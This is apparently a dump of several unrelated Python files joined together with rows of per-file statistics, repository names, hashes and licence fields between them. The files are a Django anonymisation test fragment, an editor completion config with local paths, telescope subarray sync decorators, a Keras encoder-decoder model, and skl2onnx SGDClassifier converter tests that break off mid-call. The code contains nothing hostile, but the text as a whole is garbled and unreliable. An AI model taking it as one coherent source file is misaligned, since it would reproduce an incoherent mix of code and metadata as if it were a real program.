test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner', shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode,
automatic_anonymous_id='Some anonymous name')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_examineruser, user_role='examiner'),
'Test Examiner (testexaminer@example.com)')
class TestGroupUserLookupViewroleAdmin(test.TestCase):
viewrole = 'admin'
def test_user_role_admin_get_unanonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_adminuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Admin',
shortname='testadmin@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_adminuser, user_role='admin'),
'Test Admin (testadmin@example.com)')
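# Editorial summary of the behaviour pinned down above (inferred from the
# assertions, not from the GroupUserLookup implementation itself): admins are
# never anonymized to anyone; on SEMI/FULLY anonymous assignments, examiners
# and students are anonymized to each other (the custom candidate_id when the
# assignment uses custom candidate ids, otherwise automatic_anonymous_id, with
# 'User removed from semester' as the fallback), but users are never anonymized
# to peers in their own role or to themselves.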
| 73.907767
| 128
| 0.702496
| 3,044
| 30,450
| 6.715506
| 0.03318
| 0.058996
| 0.043293
| 0.057529
| 0.969377
| 0.968643
| 0.968643
| 0.968643
| 0.959593
| 0.959202
| 0
| 0.000336
| 0.218489
| 30,450
| 411
| 129
| 74.087591
| 0.85868
| 0.018982
| 0
| 0.891117
| 0
| 0
| 0.152655
| 0.084972
| 0
| 0
| 0
| 0
| 0.083095
| 1
| 0.083095
| false
| 0
| 0.014327
| 0
| 0.114613
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43823a8187624d8642540cc06d3d40173617fc50
| 241
|
py
|
Python
|
.ycm_extra_conf.py
|
Firenox89/mopidy-aurora
|
a2f365cb755218e15d04c9574b7ad154f6379f15
|
[
"Apache-2.0"
] | null | null | null |
.ycm_extra_conf.py
|
Firenox89/mopidy-aurora
|
a2f365cb755218e15d04c9574b7ad154f6379f15
|
[
"Apache-2.0"
] | null | null | null |
.ycm_extra_conf.py
|
Firenox89/mopidy-aurora
|
a2f365cb755218e15d04c9574b7ad154f6379f15
|
[
"Apache-2.0"
] | null | null | null |
def Settings( **kwargs ):
return {
'sys_path': [
'/home/firenox/git/mopidy-aurora/mopidy_aurora',
'/home/firenox/git/mopidy-aurora',
'/home/firenox/git/nanoleaf',
'/home/firenox/git/nanoleaf/nanoleaf'
]
}
| 24.1
| 54
| 0.614108
| 27
| 241
| 5.407407
| 0.444444
| 0.30137
| 0.383562
| 0.273973
| 0.534247
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.207469
| 241
| 9
| 55
| 26.777778
| 0.764398
| 0
| 0
| 0
| 0
| 0
| 0.60166
| 0.568465
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| true
| 0
| 0
| 0.111111
| 0.222222
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
|
0
| 9
|
78de7c83c234951d74a0f5768587f720a9b5ac99
| 20,058
|
py
|
Python
|
post-deployment/resources/test_support/sync_decorators.py
|
ska-telescope/tmc-prototype
|
4138274e933d4b05f7fe9fc34a11c417b6d0d336
|
[
"BSD-3-Clause"
] | 3
|
2019-01-10T11:49:36.000Z
|
2019-07-19T03:32:52.000Z
|
post-deployment/resources/test_support/sync_decorators.py
|
ska-telescope/tmc-prototype
|
4138274e933d4b05f7fe9fc34a11c417b6d0d336
|
[
"BSD-3-Clause"
] | 19
|
2019-01-07T14:50:26.000Z
|
2019-10-02T13:25:23.000Z
|
post-deployment/resources/test_support/sync_decorators.py
|
ska-telescope/tmc-prototype
|
4138274e933d4b05f7fe9fc34a11c417b6d0d336
|
[
"BSD-3-Clause"
] | 1
|
2018-12-21T13:39:23.000Z
|
2018-12-21T13:39:23.000Z
|
import functools
from resources.test_support.helpers import waiter, watch, resource
from contextlib import contextmanager
import signal
import logging
from contextlib import contextmanager
# pre-checks
def check_going_out_of_empty():
##Verify once that obsState == EMPTY
resource("mid_csp/elt/subarray_01").assert_attribute("obsState").equals("EMPTY")
resource("mid_sdp/elt/subarray_1").assert_attribute("obsState").equals("EMPTY")
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals("EMPTY")
def check_going_into_configure():
##Can only configure a subarray that is in IDLE/ON
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals(
["IDLE", "READY"]
)
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("ON")
def check_going_into_abort():
##Can only invoke abort on a subarray when in IDLE, SCANNING, CONFIGURING, READY
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals(
["IDLE", "SCANNING", "CONFIGURING", "READY"]
)
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("ON")
def check_going_into_restart():
##Can only invoke restart on a subarray when in ABORTED, FAULT
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals(
["ABORTED", "FAULT"]
)
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("ON")
def check_coming_out_of_standby():
##Can only start up a disabled telescope
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("OFF")
def check_going_out_of_configured():
##Can only return to ON/IDLE if in READY
resource("mid_csp/elt/subarray_01").assert_attribute("obsState").equals("READY")
resource("mid_sdp/elt/subarray_1").assert_attribute("obsState").equals("READY")
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals("READY")
def check_going_out_of_aborted():
##Can only restart (return to EMPTY) if the subarray is currently in ABORTED
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals(
"ABORTED"
)
def check_going_out_of_abort():
##Can only return to ON/IDLE if in READY
print("Checking aborting obsState verification")
# resource('mid_csp/elt/subarray_01').assert_attribute('obsState').equals('ABORTED')
# resource('mid_sdp/elt/subarray_1').assert_attribute('obsState').equals('ABORTED')
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals(
"ABORTED"
)
def check_sa_going_into_fault():
##Can only return to IDLE if in FAULT
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals(
"FAULT"
)
def check_going_into_empty():
##Can only release resources if subarray is in ON/IDLE
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("ON")
print("In check_going_into_empty")
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals("IDLE")
def check_going_into_standby():
print("In check_going_into_standby")
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("ON")
# Note: make use of this helper while updating integration tests for sp-1623
def check_coming_out_of_tmc_off():
##Can only start up a disabled telescope
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("OFF")
resource("ska_mid/tm_leaf_node/csp_subarray01").assert_attribute("State").equals("OFF")
resource("ska_mid/tm_leaf_node/sdp_subarray01").assert_attribute("State").equals("OFF")
resource("ska_mid/tm_leaf_node/csp_master").assert_attribute("State").equals("OFF")
resource("ska_mid/tm_leaf_node/csp_master").assert_attribute("State").equals("OFF")
resource("ska_mid/tm_leaf_node/d0001").assert_attribute("State").equals("OFF")
# Note: make use of this helper while updating integration tests for sp-1623
def check_going_into_tmc_off_or_standby():
print("In check_going_into_tmc_off")
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("ON")
resource("ska_mid/tm_leaf_node/csp_subarray01").assert_attribute("State").equals("ON")
resource("ska_mid/tm_leaf_node/sdp_subarray01").assert_attribute("State").equals("ON")
resource("ska_mid/tm_leaf_node/csp_master").assert_attribute("State").equals("ON")
resource("ska_mid/tm_leaf_node/csp_master").assert_attribute("State").equals("ON")
resource("ska_mid/tm_leaf_node/d0001").assert_attribute("State").equals("ON")
def check_going_into_fault_for_cspsaln():
resource("ska_mid/tm_leaf_node/csp_subarray01").assert_attribute("State").equals("FAULT")
print("Check csp device going into Fault")
def check_going_into_fault_for_sdpsaln():
resource("ska_mid/tm_leaf_node/sdp_subarray01").assert_attribute("State").equals("FAULT")
print("Check sdp device going into Fault")
# wait helpers (set up before a command is dispatched, waited on after)
class WaitConfigure:
def __init__(self):
self.w = watch(resource("ska_mid/tm_subarray_node/1")).for_a_change_on(
"obsState"
)
self.w1 = watch(resource("mid_csp/elt/subarray_01")).for_a_change_on("obsState")
self.w2 = watch(resource("mid_sdp/elt/subarray_1")).for_a_change_on("obsState")
def wait(self):
# self.w.wait_until_value_changed_to('CONFIGURING')
self.w.wait_until_value_changed_to("READY", timeout=500)
self.w1.wait_until_value_changed_to("READY", timeout=500)
self.w2.wait_until_value_changed_to("READY", timeout=500)
def wait_oet(self):
self.w.wait_until_value_changed_to("READY", timeout=200)
class WaitAbort:
def __init__(self):
self.w = watch(resource("ska_mid/tm_subarray_node/1")).for_a_change_on(
"obsState"
)
self.w1 = watch(resource("mid_csp/elt/subarray_01")).for_a_change_on("obsState")
self.w2 = watch(resource("mid_sdp/elt/subarray_1")).for_a_change_on("obsState")
def wait(self, timeout):
logging.info(
"Abort command dispatched, checking that the state transitioned to ABORTING"
)
# self.the_watch.wait_until_value_changed_to('ABORTING',timeout)
logging.info(
"state transitioned to ABORTING, waiting for it to return to ABORTED"
)
self.w.wait_until_value_changed_to("ABORTED", timeout=200)
self.w1.wait_until_value_changed_to("ABORTED", timeout=200)
self.w2.wait_until_value_changed_to("ABORTED", timeout=200)
class WaitRestart:
def __init__(self):
self.w = watch(resource("ska_mid/tm_subarray_node/1")).for_a_change_on(
"obsState"
)
self.w1 = watch(resource("mid_csp/elt/subarray_01")).for_a_change_on("obsState")
self.w2 = watch(resource("mid_sdp/elt/subarray_1")).for_a_change_on("obsState")
def wait(self, timeout):
logging.info(
"Restart command dispatched, checking that the state transitioned to RESTARTING"
)
# self.the_watch.wait_until_value_changed_to('RESTARTING',timeout)
logging.info(
"state transitioned to RESTARTING, waiting for it to return to EMPTY"
)
self.w.wait_until_value_changed_to("EMPTY", timeout=200)
self.w1.wait_until_value_changed_to("EMPTY", timeout=200)
self.w2.wait_until_value_changed_to("EMPTY", timeout=200)
class WaitObsReset:
def __init__(self):
self.w = watch(resource("ska_mid/tm_subarray_node/1")).for_a_change_on(
"obsState"
)
self.w1 = watch(resource("mid_csp/elt/subarray_01")).for_a_change_on("obsState")
self.w2 = watch(resource("mid_sdp/elt/subarray_1")).for_a_change_on("obsState")
def wait(self, timeout):
logging.info(
"ObsReset command dispatched, checking that the state transitioned to RESETTING"
)
logging.info(
"state transitioned to RESETTING, waiting for it to return to IDLE"
)
self.w.wait_until_value_changed_to("IDLE", timeout=200)
self.w1.wait_until_value_changed_to("IDLE", timeout=200)
self.w2.wait_until_value_changed_to("IDLE", timeout=200)
class WaitResetCspsaln:
def __init__(self):
self.w1 = watch(resource("ska_mid/tm_leaf_node/csp_subarray01")).for_a_change_on("State")
def wait(self, timeout):
logging.info(
"Reset command dispatched, checking that the state transitioned to OFF"
)
self.w1.wait_until_value_changed_to("OFF", timeout=200)
class WaitResetSdpsaln:
def __init__(self):
self.w = watch(resource("ska_mid/tm_leaf_node/sdp_subarray01")).for_a_change_on("State")
def wait(self, timeout):
logging.info(
"Reset command dispatched, checking that the state transitioned to OFF"
)
self.w.wait_until_value_changed_to("OFF", timeout=200)
class WaitScanning:
def __init__(self):
self.w = watch(resource("ska_mid/tm_subarray_node/1")).for_a_change_on(
"obsState"
)
self.w1 = watch(resource("mid_csp/elt/subarray_01")).for_a_change_on("obsState")
self.w2 = watch(resource("mid_sdp/elt/subarray_1")).for_a_change_on("obsState")
def wait(self, timeout):
logging.info(
"scan command dispatched, checking that the state transitioned to SCANNING"
)
self.w.wait_until_value_changed_to("SCANNING", timeout)
self.w1.wait_until_value_changed_to("SCANNING", timeout)
self.w2.wait_until_value_changed_to("SCANNING", timeout)
logging.info(
"state transitioned to SCANNING, waiting for it to return to READY"
)
self.w.wait_until_value_changed_to("READY", timeout)
self.w1.wait_until_value_changed_to("READY", timeout)
self.w2.wait_until_value_changed_to("READY", timeout)
def sync_assign_resources(nr_of_receptors=2, timeout=600):
# defined as a decorator
def decorator_sync_assign_resources(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_out_of_empty()
the_waiter = waiter()
the_waiter.set_wait_for_assign_resources(nr_of_receptors=nr_of_receptors)
################
result = func(*args, **kwargs)
################
the_waiter.wait(timeout=timeout)
return result
return wrapper
return decorator_sync_assign_resources
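# A hypothetical usage sketch for the decorator form above (the decorated
# function body is an assumption, not part of this module):
#
# @sync_assign_resources(nr_of_receptors=2, timeout=600)
# def assign_resources():
#     ...  # dispatch the AssignResources command here
#
# check_going_out_of_empty() runs before the wrapped call and the waiter after.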
# defined as a context manager
@contextmanager
def sync_assigned_resources(nr_of_receptors=4):
check_going_out_of_empty()
the_waiter = waiter()
the_waiter.set_wait_for_assign_resources(nr_of_receptors=nr_of_receptors)
yield
the_waiter.wait(timeout=60)
##This applies only when using TMC device proxies; the OET command blocks for the entire duration
def sync_configure(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
##Can only configure a subarray that is in IDLE/ON
check_going_into_configure()
w = WaitConfigure()
################
result = func(*args, **kwargs)
################
w.wait()
return result
return wrapper
# defined as a context manager
@contextmanager
def sync_configuration():
check_going_into_configure()
w = WaitConfigure()
yield
w.wait()
def sync_configure_oet(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
##Can only configure a subarray that is in IDLE/ON
check_going_into_configure()
w = WaitConfigure()
################
result = func(*args, **kwargs)
################
w.wait_oet()
return result
return wrapper
# defined as a context manager
@contextmanager
def sync_oet_configuration():
check_going_into_configure()
w = WaitConfigure()
yield
w.wait_oet()
def handle_timeout(signum, frame):
print("operation timeout")
raise Exception("operation timeout")
def time_it(timeout):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
signal.signal(signal.SIGALRM, handle_timeout)
signal.alarm(timeout)  # raise after `timeout` seconds if the wrapped call is still stuck
################
result = func(*args, **kwargs)
################
signal.alarm(0)
return result
return wrapper
return decorator
# defined as a context manager
@contextmanager
def limited_time_routine(timeout):
signal.signal(signal.SIGALRM, handle_timeout)
signal.alarm(timeout)  # raise after `timeout` seconds if the guarded block is still stuck
yield
signal.alarm(0)
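# Illustrative usage (a sketch, not from the original file; SIGALRM-based
# timeouts only work in the main thread on POSIX platforms):
def _demo_timeout_guard():
    @time_it(5)
    def slow_step():
        return "done"

    slow_step()  # raises "operation timeout" if it takes longer than 5 s

    with limited_time_routine(5):
        slow_step()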
def sync_start_up_telescope(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_coming_out_of_standby()
the_waiter = waiter()
the_waiter.set_wait_for_starting_up()
result = func(*args, **kwargs)
the_waiter.wait(50)
return result
return wrapper
# defined as a context manager
@contextmanager
def sync_telescope_starting_up(timeout=50):
check_coming_out_of_standby()
the_waiter = waiter()
the_waiter.set_wait_for_starting_up()
yield
the_waiter.wait(timeout)
def sync_end_sb(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_out_of_configured()
the_waiter = waiter()
the_waiter.set_wait_for_ending_SB()
result = func(*args, **kwargs)
the_waiter.wait(300)
return result
return wrapper
def sync_restart_sa(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_out_of_aborted()
the_waiter = waiter()
the_waiter.set_wait_for_going_into_restarting()
result = func(*args, **kwargs)
the_waiter.wait(100)
return result
return wrapper
# defined as a context manager
@contextmanager
def sync_sb_ending():
check_going_out_of_configured()
the_waiter = waiter()
the_waiter.set_wait_for_ending_SB()
yield
the_waiter.wait()
def sync_release_resources(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
print("In sync_release_resources")
check_going_into_empty()
the_waiter = waiter()
the_waiter.set_wait_for_tearing_down_subarray()
result = func(*args, **kwargs)
the_waiter.wait(150)
return result
return wrapper
# defined as a context manager
@contextmanager
def sync_resources_releasing(timeout=100):
the_waiter = waiter()
the_waiter.set_wait_for_tearing_down_subarray()
yield
the_waiter.wait(timeout)
def sync_set_to_standby(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_into_standby()
the_waiter = waiter()
the_waiter.set_wait_for_going_to_standby()
result = func(*args, **kwargs)
the_waiter.wait(100)
return result
return wrapper
# defined as a context manager
@contextmanager
def sync_going_to_standby(timeout=50):
check_going_into_standby()
the_waiter = waiter()
the_waiter.set_wait_for_going_to_standby()
yield
the_waiter.wait(timeout)
def sync_scan(timeout=500):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_out_of_configured()
w = WaitScanning()
result = func(*args, **kwargs)
w.wait(timeout)
return result
return wrapper
return decorator
def sync_abort(timeout=200):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_into_abort()
w = WaitAbort()
################
result = func(*args, **kwargs)
################
w.wait(timeout)
return result
return wrapper
return decorator
def sync_restart(timeout=200):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
# check_going_into_restart()
check_going_out_of_abort()
w = WaitRestart()
################
result = func(*args, **kwargs)
################
w.wait(timeout)
return result
return wrapper
return decorator
def sync_obsreset(timeout=200):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
# check_going_into_resetting()
check_going_out_of_abort()
w = WaitObsReset()
################
result = func(*args, **kwargs)
################
w.wait(timeout)
return result
return wrapper
return decorator
def sync_obsreset_sa(timeout=200):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_sa_going_into_fault()
w = WaitObsReset()
################
result = func(*args, **kwargs)
################
w.wait(timeout)
return result
return wrapper
return decorator
def sync_cspsaln_reset(timeout=200):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_into_fault_for_cspsaln()
w = WaitResetCspsaln()
################
result = func(*args, **kwargs)
################
w.wait(timeout)
return result
return wrapper
return decorator
def sync_sdpsaln_reset(timeout=200):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
# check_going_into_resetting()
check_going_into_fault_for_sdpsaln()
w = WaitResetSdpsaln()
################
result = func(*args, **kwargs)
################
w.wait(timeout)
return result
return wrapper
return decorator
# defined as a context manager
@contextmanager
def sync_scanning(timeout=200):
check_going_out_of_configured()
w = WaitScanning()
yield
w.wait(timeout)
def sync_scan_oet(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_out_of_configured()
the_waiter = waiter()
the_waiter.set_wait_for_going_into_scanning()
result = func(*args, **kwargs)
the_waiter.wait()
return result
return wrapper
# defined as a context manager
@contextmanager
def sync_oet_scanning():
check_going_out_of_configured()
the_waiter = waiter()
the_waiter.set_wait_for_going_into_scanning()
yield
the_waiter.wait()
# Note: use this method when updating the integration tests for sp-1623
def sync_tmc_on(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_coming_out_of_tmc_off()
the_waiter = waiter()
the_waiter.set_wait_for_tmc_up()
result = func(*args, **kwargs)
the_waiter.wait(50)
return result
return wrapper
# Note: use this method when updating the integration tests for sp-1623
def sync_tmc_off(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_into_tmc_off_or_standby()
the_waiter = waiter()
the_waiter.set_wait_for_going_to_off()
result = func(*args, **kwargs)
the_waiter.wait(100)
return result
return wrapper
# Note: use this method when updating the integration tests for sp-1623
def sync_tmc_standby(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_into_tmc_off_or_standby()
the_waiter = waiter()
the_waiter.set_wait_for_going_to_standby()
result = func(*args, **kwargs)
the_waiter.wait(100)
return result
return wrapper
| 31.291732
| 103
| 0.659836
| 2,550
| 20,058
| 4.89451
| 0.07451
| 0.034613
| 0.040381
| 0.04615
| 0.870042
| 0.84216
| 0.80931
| 0.770531
| 0.717811
| 0.649147
| 0
| 0.014236
| 0.219015
| 20,058
| 641
| 104
| 31.291732
| 0.782509
| 0.097816
| 0
| 0.64588
| 0
| 0
| 0.163262
| 0.080982
| 0
| 0
| 0
| 0
| 0.073497
| 1
| 0.200445
| false
| 0
| 0.013363
| 0
| 0.33853
| 0.017817
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78fc376bd7411b06dcf72116dba11999ee702ba7
| 4,698
|
py
|
Python
|
train/Models/VCD.py
|
louisletoumelin/wind_downscaling_cnn
|
9d08711620db1ee1f472847f0e822c5f4eb1d300
|
[
"W3C"
] | null | null | null |
train/Models/VCD.py
|
louisletoumelin/wind_downscaling_cnn
|
9d08711620db1ee1f472847f0e822c5f4eb1d300
|
[
"W3C"
] | 12
|
2021-11-30T16:56:05.000Z
|
2021-12-13T16:26:31.000Z
|
train/Models/VCD.py
|
louisletoumelin/wind_downscaling_cnn
|
9d08711620db1ee1f472847f0e822c5f4eb1d300
|
[
"W3C"
] | null | null | null |
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D, BatchNormalization, LeakyReLU, \
LSTM, UpSampling2D, Conv2DTranspose, ZeroPadding2D, Cropping2D, UpSampling1D
def build_VCD(prm):
model = Sequential()
model.add(ZeroPadding2D(padding=((0, 1), (0, 1)), input_shape=prm['input_shape']))
# CONVOLUTION
model.add(Conv2D(prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2D(prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(MaxPool2D(pool_size=prm['pool_size']))
model.add(BatchNormalization())
model.add(Dropout(prm['dropout']))
model.add(Conv2D(2 * prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2D(2 * prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(MaxPool2D(pool_size=prm['pool_size']))
model.add(BatchNormalization())
model.add(Dropout(prm['dropout']))
model.add(Conv2D(4 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2D(4 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(MaxPool2D(pool_size=prm['pool_size']))
model.add(BatchNormalization())
model.add(Dropout(prm['dropout']))
model.add(Conv2D(8 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2D(8 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(BatchNormalization())
model.add(Dropout(prm['dropout']))
# DECONVOLUTION
model.add(Conv2DTranspose(8 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2DTranspose(8 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(BatchNormalization())
model.add(Dropout(prm['dropout']))
model.add(UpSampling2D(size=prm['up_conv']))
model.add(ZeroPadding2D(padding=((0, 0), (0, 1))))
model.add(Conv2DTranspose(4 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2DTranspose(4 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(UpSampling2D(size=prm['up_conv']))
model.add(ZeroPadding2D(padding=((0, 0), (0, 1))))
model.add(BatchNormalization())
model.add(Dropout(prm['dropout']))
model.add(Conv2DTranspose(2 * prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2DTranspose(2 * prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(UpSampling2D(size=prm['up_conv']))
model.add(BatchNormalization())
model.add(Dropout(prm['dropout']))
model.add(Conv2DTranspose(prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2DTranspose(prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Dropout(prm['dropout']))
model.add(Conv2DTranspose(prm['nb_channels_output'], (5, 5), activation=prm['activation_regression'],
padding=prm['padding'], kernel_initializer=prm['initializer_func']))
model.add(Cropping2D(cropping=((0, 1), (0, 1))))
return model
def VCD(prm):
model = build_VCD(prm)
print('\n Model selected: VCD\n')
print(model.summary())
return model
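# Illustrative parameter set (a sketch; these values are assumptions, not the
# training configuration of the original repository). With a 79 x 69 x 1 input,
# the zero-padding/cropping pairs make the output match the input height/width:
if __name__ == '__main__':
    prm_example = {
        'input_shape': (79, 69, 1),
        'nb_filters': 32,
        'activation': 'relu',
        'padding': 'same',
        'initializer_func': 'glorot_uniform',
        'pool_size': (2, 2),
        'dropout': 0.25,
        'up_conv': (2, 2),
        'nb_channels_output': 3,
        'activation_regression': 'linear',
    }
    VCD(prm_example)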
| 52.786517
| 121
| 0.640911
| 533
| 4,698
| 5.525328
| 0.106942
| 0.114092
| 0.132767
| 0.132767
| 0.858065
| 0.839728
| 0.839728
| 0.839728
| 0.839728
| 0.839728
| 0
| 0.025059
| 0.184547
| 4,698
| 88
| 122
| 53.386364
| 0.74367
| 0.005321
| 0
| 0.814286
| 0
| 0
| 0.190364
| 0.004497
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0
| 0.028571
| 0
| 0.085714
| 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
60300106bf44a156fb6f85f17351087c4892209d
| 17,287
|
py
|
Python
|
tests/test_sklearn_sgd_classifier_converter.py
|
vinitra-zz/sklearn-onnx
|
a8f2657525d0b4dd279bcd1a971397d002929a77
|
[
"MIT"
] | null | null | null |
tests/test_sklearn_sgd_classifier_converter.py
|
vinitra-zz/sklearn-onnx
|
a8f2657525d0b4dd279bcd1a971397d002929a77
|
[
"MIT"
] | null | null | null |
tests/test_sklearn_sgd_classifier_converter.py
|
vinitra-zz/sklearn-onnx
|
a8f2657525d0b4dd279bcd1a971397d002929a77
|
[
"MIT"
] | 1
|
2020-10-01T09:26:27.000Z
|
2020-10-01T09:26:27.000Z
|
"""Tests scikit-learn's SGDClassifier converter."""
import unittest
import numpy as np
from sklearn.linear_model import SGDClassifier
from skl2onnx import convert_sklearn
from skl2onnx.common.data_types import FloatTensorType, Int64TensorType
from skl2onnx.common.data_types import onnx_built_with_ml
from test_utils import dump_data_and_model, fit_classification_model
class TestSGDClassifierConverter(unittest.TestCase):
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_hinge(self):
model, X = fit_classification_model(
SGDClassifier(loss='hinge', random_state=42), 2)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierBinaryHinge-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_hinge(self):
model, X = fit_classification_model(
SGDClassifier(loss='hinge', random_state=42), 5)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierMultiHinge-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_hinge_string(self):
model, X = fit_classification_model(
SGDClassifier(loss='hinge', random_state=42), 5, label_string=True)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
